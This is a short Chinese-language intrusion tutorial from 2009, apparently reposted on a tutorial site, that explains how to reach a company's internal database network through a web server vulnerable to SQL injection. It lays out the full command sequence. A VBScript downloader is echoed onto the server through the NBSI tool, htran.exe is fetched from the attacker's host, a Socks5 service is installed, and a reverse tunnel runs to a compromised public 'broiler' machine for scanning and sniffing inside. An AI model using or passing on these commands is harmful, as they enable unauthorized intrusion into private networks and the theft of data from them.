当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 妙用代理渗透内网

安全基础
威胁同样巨大 基于Telnet协议的攻击
基础知识 XST攻击理论及手法讲解
黑客破解Email账号常用的三种方法
攻防技术:动态IP地址的捕获及其应用
踏雪无痕 浅析黑客避开检测的手段
黑客必学—开启肉鸡终端全攻略
黑客入侵实例 记对Discuz论坛的入侵
浅析无线入侵检测系统 的应用及优缺点
黑客种植木马新方法及防范策略
小规模DDoS(拒绝服务)用Freebsd+IPFW搞定
一次意外的入侵经历-黑冰防火墙溢出攻击
利用“http暗藏通道”大举攻破局域网
黑客如何利用Ms05002溢出找“肉鸡”
看我谋取特权 用漏洞提升计算机控制权限
互联网的巨大威胁 ICMP洪水攻击浅析
实例讲解 黑客入侵论坛各种手段大暴光
入侵技巧 通过“鼠洞”控制你的电脑
黑客攻击揭密-分析选定的网络攻击
打破常规 构造特殊字符进行渗透入侵
安全必知:黑客入侵无线网络常用手段

安全基础 中的 妙用代理渗透内网


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 116 ::
收藏到网摘: n/a

一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
  1.给内网目标机装个代理服务器
  2.把弄好的那个代理端口映到公网.
  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
  4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
  1.公网肉鸡一只:218.3.1.1
  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
  4.A:192.168.1.2   B:218.3.1.1 C:www.baidu.com D:192.168.0.25
四、入侵进行时
  1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe
  2.安装Socks5服务
在nbsi下执行:
htran.exe -install   //安装Socks5服务
htran.exe -start   //启动Socks5服务
  3.反弹进行时
在B上运行:   htran.exe -s -listen 520 5200   //监听端口
在nbsi下执行:htran.exe -s -connect 218.3.1.1 520
  3.进入内网
现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。
五、渗透内网
  接下来就可以扫描,嗅探,等等,也就是后话了。
六、总结
  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。